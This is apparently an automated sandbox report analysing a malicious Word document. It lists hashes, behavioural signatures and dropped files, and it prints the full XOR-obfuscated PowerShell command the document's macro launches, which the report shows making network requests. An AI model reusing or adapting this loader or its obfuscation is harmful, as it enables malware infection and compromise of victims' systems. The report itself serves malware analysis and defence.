Analysis
-
max time kernel
136s -
max time network
126s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
19-05-2024 10:18
Behavioral task
behavioral1
Sample
59e447e4f4dc430a2fa225dda10aeb20_JaffaCakes118.doc
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
59e447e4f4dc430a2fa225dda10aeb20_JaffaCakes118.doc
Resource
win10v2004-20240426-en
General
-
Target
59e447e4f4dc430a2fa225dda10aeb20_JaffaCakes118.doc
-
Size
206KB
-
MD5
59e447e4f4dc430a2fa225dda10aeb20
-
SHA1
1582f27a27a5ceb1066e50e2ded5088b2dd9c118
-
SHA256
666edb5d9868c952bd0fa5ed0741e23cd81f0c74832c73186fc6e1304d4e39e1
-
SHA512
2c3b047038e2af63a45eb0a429f0a3350f4faf42c9be0e70ec82997ac0c50e6466341da5c1347458f995d835a7a3e3899094c7ad1b38e58e79facc39acd4e3f3
-
SSDEEP
3072:wH9nBf4SuEjAhmAMOc7kkkko1rkGuF3tBInxGGq5fyXJm9YBmjDsl5zZMr:wFVeEsjdXRC3jexGG6kYWofsx0
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
PowersHELL.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 4440 1996 PowersHELL.exe WINWORD.EXE -
Blocklisted process makes network request 5 IoCs
Processes:
PowersHELL.exeflow pid process 21 4440 PowersHELL.exe 55 4440 PowersHELL.exe 82 4440 PowersHELL.exe 109 4440 PowersHELL.exe 111 4440 PowersHELL.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 1996 WINWORD.EXE 1996 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
PowersHELL.exepid process 4440 PowersHELL.exe 4440 PowersHELL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
PowersHELL.exedescription pid process Token: SeDebugPrivilege 4440 PowersHELL.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
WINWORD.EXEpid process 1996 WINWORD.EXE 1996 WINWORD.EXE 1996 WINWORD.EXE 1996 WINWORD.EXE 1996 WINWORD.EXE 1996 WINWORD.EXE 1996 WINWORD.EXE 1996 WINWORD.EXE -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
WINWORD.EXEdescription pid process target process PID 1996 wrote to memory of 4440 1996 WINWORD.EXE PowersHELL.exe PID 1996 wrote to memory of 4440 1996 WINWORD.EXE PowersHELL.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\59e447e4f4dc430a2fa225dda10aeb20_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Windows\System32\WindowsPowerShell\v1.0\PowersHELL.exePowersHELL .( $shElliD[1]+$ShEllId[13]+'X')( "$(SEt-iteM 'vaRIabLe:oFS' '')"+ [strINg]('30Y84N127S125w7<84Y95N77R23j85S88N80%95w89N78%26N116j95K78w20<109K95<88R121<86R83K95K84j78R1S30S112<83S81R7K29N82w78R78R74K0S21Y21%77w77w77K20K67w95S78j91R84%85R78w82%95N72N73j78%95w76Y95K20S89N85S87S21j98<73N12R110<106w77R84j123%123N112S21S122S82w78j78R74Y0N21<21%92S86<95K77K95S72N20m74R86j21<74K79m88K21m73%3Y3%15K15m12N87%21%122S82S78<78Y74Y0Y21Y21Y77w77S77K20w82%85K78N95<86K89Y91K74N83w78w91R86m20<72N79S21N92m12%124m120<112Y126w21w122R82<78w78j74R0Y21K21<94S89%20%91w87S95w93Y78Y20Y89S85K87%21w77K74<23j89N85Y84%78S95Y84S78Y21j85m121K14Y93N67N14N91Y125R118m21%122<82m78m78%74R0%21K21N77K77K77m20j91Y72R87<91N84<83w78%85j79<72<20K89<85S87K21R81m79j116Y117m75K115w21Y29Y20<105S74m86m83S78S18m29m122K29%19K1S30j82m117j98R26S7K26Y29j8%3<11N29S1K30S86w104Y75N7K30R95m84w76%0S78N95%87w74N17<29N102m29j17S30N82N117w98S17R29%20Y95%66<95S29j1m92Y85%72%95R91m89S82<18%30m126Y98R107%26<83j84w26<30<112S83R81w19j65R78N72K67K65w30j84<127R125N20N126K85m77R84N86<85<91w94Y124N83Y86R95%18Y30R126K98K107S22j26K30N86R104K75K19K1S105j78%91S72m78w23w106w72N85R89R95S73%73N26S30K86Y104%75<1%88S72Y95N91S81S1K71N89w91<78K89N82%65N71<71'-split 'w' -split 'Y'-sPlIt 'K' -sPlIT '<'-sPlIt 'N' -sPLiT 's'-split'r'-SpLit '%' -SPlit 'M'-SPlit 'J'|foREaCH-OBjEct{ [CHar] ( $_-BXOr 0x3a )}) +" $(SEt 'ofs' ' ')")2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4440
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
114B
MD5e89f75f918dbdcee28604d4e09dd71d7
SHA1f9d9055e9878723a12063b47d4a1a5f58c3eb1e9
SHA2566dc9c7fc93bb488bb0520a6c780a8d3c0fb5486a4711aca49b4c53fac7393023
SHA5128df0ab2e3679b64a6174deff4259ae5680f88e3ae307e0ea2dfff88ec4ba14f3477c9fe3a5aa5da3a8e857601170a5108ed75f6d6975958ac7a314e4a336aed0
-
Filesize
245KB
MD5f883b260a8d67082ea895c14bf56dd56
SHA17954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82